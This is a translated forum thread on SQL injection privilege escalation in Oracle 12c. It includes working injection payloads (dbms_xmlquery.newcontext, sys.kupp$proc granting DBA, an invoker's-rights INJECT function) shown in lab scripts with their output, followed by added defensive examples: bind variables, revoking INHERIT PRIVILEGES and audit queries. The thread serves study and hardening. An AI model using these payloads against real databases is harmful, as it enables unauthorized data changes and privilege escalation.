1

Topic: SQL injection in Oracle 12c

Good day! There is a well-known paper by David Litchfield describing the use of SQL injection to obtain DBA privileges: http://www.davidlitchfield.com/Exploiti … e_12c.pdf.
The paper gives an example that uses an unprotected procedure created by the user sys. Accordingly, having only access to this procedure and the create session privilege, we can do whatever our heart desires.
The problem is the following:
Suppose the vulnerable procedure vulnProc is created not by the user sys but by user1, who has the dba role.
There is also a user user2, who has the right to use this procedure, the right to create a session, and the right to view the tables created by user1.
And for the life of me I cannot understand how to use this vulnerability so that user2 could do an insert into user1's table.
I ask for help and advice)

2

Re: SQL injection in Oracle 12c

To begin with: a procedure/function/package is by default created with DEFINER RIGHTS, which means the procedure is executed in the owner's security domain, with the privileges granted to the owner directly rather than through roles (roles are also ignored at compilation, by the way, irrespective of DEFINER RIGHTS or INVOKER RIGHTS). So whether user1 has DBA or not makes no difference.
SY.

3

Re: SQL injection in Oracle 12c

Thanks, I will know)
But the essence of the question does not change because of that. Or perhaps someone knows other ways to carry out an injection under the given conditions?

4

Re: SQL injection in Oracle 12c

SoratoMan wrote:

Suppose the vulnerable procedure vulnProc is created not by the user sys but by user1, who has the dba role.
There is also a user user2, who has the right to use this procedure, the right to create a session, and the right to view the tables created by user1.
And for the life of me I cannot understand how to use this vulnerability so that user2 could do an insert into user1's table.
I ask for help and advice)

We create users

drop user u1 cascade;
drop user u2 cascade;
create user u1 identified by 1;
grant create session, connect to u1;
grant dba to u1;
create user u2 identified by 1;
grant create session, connect to u2;

U1

connect u1/1
create or replace procedure p (p in varchar2) as
result int;
begin
execute immediate ' select count (*) from dual where ' || p || ' = 1 ' into result;
dbms_output.put_line (result);
end;
/
create table t as select 0 id from dual;
grant select on t to u2;
grant execute on p to u2;

U2

SQL> connect u2/1
Connected.
SQL> set serveroutput on
SQL> exec u1.p(q'#dbms_xmlquery.newcontext('declare pragma autonomous_transaction; begin insert into t values (1); commit; end;')#');
0
PL/SQL procedure successfully completed.
SQL> select * from u1.t;
ID
----------
0
1

In 12 this loophole was closed.

5

Re: SQL injection in Oracle 12c

Just for fun
We create users

drop user u1 cascade;
drop user u2 cascade;
create user u1 identified by 1;
grant create session, connect to u1;
grant dba to u1;
==> grant execute on sys.kupp$proc to u1;
create user u2 identified by 1;
grant create session, connect to u2;

U1

connect u1/1
create or replace procedure p (p in varchar2) as
result int;
begin
execute immediate ' select count (*) from dual where ' || p || ' = 1 ' into result;
dbms_output.put_line (result);
end;
/
grant execute on p to u2;

U2

SQL> connect u2/1
Connected.
SQL> exec u1.p(q'#sys.kupp$proc.create_master_process('execute immediate ''grant dba to u2'';')#');
PL/SQL procedure successfully completed.
SQL> drop user u1 cascade;
drop user u1 cascade
*
ERROR at line 1:
ORA-01031: insufficient privileges
==> SQL> connect u2/1
Connected.
==> SQL> drop user>>> u1 <<<cascade;
==> User dropped.

6

Re: SQL injection in Oracle 12c

SoratoMan wrote:

Thanks, I will know)
But the essence of the question does not change because of that. Or perhaps someone knows other ways to carry out an injection under the given conditions?

If user2 has CREATE PROCEDURE:

drop user u1 cascade;
drop user u2 cascade;
create user u1 identified by u1
default tablespace users
quota unlimited on users;
grant create session, create table, create procedure to u1;
create user u2 identified by u2;
grant create session, create procedure to u2;
connect u1@pdb1sol12/u1
CREATE OR REPLACE
PROCEDURE VULNERABLE_PROC (P VARCHAR2)
IS
N NUMBER;
BEGIN
EXECUTE IMMEDIATE 'SELECT COUNT(*) FROM USER_OBJECTS WHERE OBJECT_NAME = ''' || P || ''''
INTO N;
DBMS_OUTPUT.PUT_LINE (N);
END;
/
GRANT EXECUTE ON VULNERABLE_PROC TO U2;
CREATE TABLE TBL1 (ID NUMBER);
GRANT SELECT ON TBL1 TO U2;
connect u2@pdb1sol12/u2
CREATE OR REPLACE
FUNCTION INJECT (
P_ID NUMBER
)
RETURN VARCHAR2
AUTHID CURRENT_USER
IS
PRAGMA AUTONOMOUS_TRANSACTION;
BEGIN
EXECUTE IMMEDIATE ' INSERT INTO U1.TBL1 VALUES (:1)'
USING P_ID;
COMMIT;
RETURN NULL;
END;
/
GRANT EXECUTE ON INJECT TO U1;
EXEC U1.VULNERABLE_PROC('TBL''|| U2.INJECT(99) ||''1')
SELECT *
FROM U1.TBL1;
ID
----------
99
99
SQL>

True, in 12C it is possible to avoid this through INHERIT PRIVILEGES.
SY.
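
An added example, not part of SY's post or the thread: the same procedure with the parameter passed as a bind variable, followed by the 12c INHERIT PRIVILEGES control mentioned above. Object names follow the script in the post; TRUSTED_OWNER is a hypothetical account name.

```sql
-- Added example, not from the thread. Names U1, U2 and VULNERABLE_PROC
-- follow the script in the post above.

-- 1. As U1: pass the caller's value as a bind variable.
--    The statement text is now constant, so P is only ever compared as
--    data; a concatenated call to U2.INJECT is never parsed as SQL.
CREATE OR REPLACE
PROCEDURE VULNERABLE_PROC (P VARCHAR2)
IS
  N NUMBER;
BEGIN
  EXECUTE IMMEDIATE
    'SELECT COUNT(*) FROM USER_OBJECTS WHERE OBJECT_NAME = :name'
    INTO N
    USING P;
  DBMS_OUTPUT.PUT_LINE(N);
END;
/

-- 2. As U1 or a DBA: drop the default 12c grant to PUBLIC. After this,
--    an AUTHID CURRENT_USER unit owned by another user cannot run with
--    U1's privileges; the call fails with ORA-06598 instead.
REVOKE INHERIT PRIVILEGES ON USER U1 FROM PUBLIC;

-- 3. Re-grant only to owners whose invoker's-rights code U1 must call
--    (TRUSTED_OWNER is a hypothetical account name).
-- GRANT INHERIT PRIVILEGES ON USER U1 TO TRUSTED_OWNER;

-- 4. Verify who may still inherit U1's privileges.
SELECT GRANTEE, PRIVILEGE
FROM   DBA_TAB_PRIVS
WHERE  TYPE = 'USER'
AND    TABLE_NAME = 'U1'
AND    PRIVILEGE = 'INHERIT PRIVILEGES';
```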

7

Re: SQL injection in Oracle 12c

Thanks a lot for the advice)
But now, out of stubbornness, I would like to understand how to apply the code from the article when it is not for sys.

8

Re: SQL injection in Oracle 12c

SoratoMan wrote:

Thanks a lot for the advice)
But now, out of stubbornness, I would like to understand how to apply the code from the article when it is not for sys.

Where did you see sys, apart from my stunt with sys.kupp$proc, and what do you mean by "not for sys"?
In order of increasing complexity, you can analyze
1) first SY's script
2) then mine with dbms_xmlquery.newcontext
3) and last of all the one with sys.kupp$proc
(1) and (2) are simply the ability to use another user's rights to its own objects through an injection;
and (3) is a typical case of SQL injection privilege escalation, but the presence of a grant on sys.kupp$proc is not typical at all.
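
An added example, not part of the thread: dictionary queries a DBA can run to find the three situations listed above in their own database, using the point from SY's first reply that only the owner's direct grants count inside definer's-rights code. The text match on EXECUTE IMMEDIATE is a coarse filter chosen for this example, and the restriction to non-Oracle-maintained accounts is an assumption about what is worth reviewing first.

```sql
-- Added example, not from the thread. Run as a user who can read DBA_* views.

-- Cases (1)/(2): definer's-rights units that build SQL dynamically and
-- that other accounts may execute. An injection into one of these acts
-- with the owner's rights on the owner's objects.
SELECT DISTINCT p.owner, p.object_name, g.grantee
FROM   dba_procedures p
JOIN   dba_tab_privs  g
       ON  g.owner      = p.owner
       AND g.table_name = p.object_name
       AND g.privilege  = 'EXECUTE'
WHERE  p.authid = 'DEFINER'
AND    p.owner IN (SELECT username FROM dba_users
                   WHERE  oracle_maintained = 'N')
AND    EXISTS (SELECT 1
               FROM   dba_source s
               WHERE  s.owner = p.owner
               AND    s.name  = p.object_name
               AND    UPPER(s.text) LIKE '%EXECUTE IMMEDIATE%')
ORDER  BY p.owner, p.object_name;

-- System privileges those owners hold directly. Roles (DBA included)
-- are ignored inside definer's-rights code, so this list, not
-- DBA_ROLE_PRIVS, is what injected SQL can use.
SELECT grantee, privilege
FROM   dba_sys_privs
WHERE  grantee IN (SELECT username FROM dba_users
                   WHERE  oracle_maintained = 'N')
ORDER  BY grantee, privilege;

-- Case (3): the non-typical direct grant shown in the thread.
-- Any row returned here for an application account deserves review.
SELECT grantee, grantor
FROM   dba_tab_privs
WHERE  owner      = 'SYS'
AND    table_name = 'KUPP$PROC'
AND    privilege  = 'EXECUTE';
```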

9

Re: SQL injection in Oracle 12c

dbms_photoshop,
The question was asked in order to achieve 2 goals:
1) To see examples of SQL injections, with which you and SY kindly helped)
2) To learn how to modify the code from the article to apply it to a procedure not created under sys.

10

Re: SQL injection in Oracle 12c

SoratoMan wrote:

To learn how to modify the code from the article to apply it to a procedure not created under sys.

Read the FAQ about rights granted through a role until full enlightenment.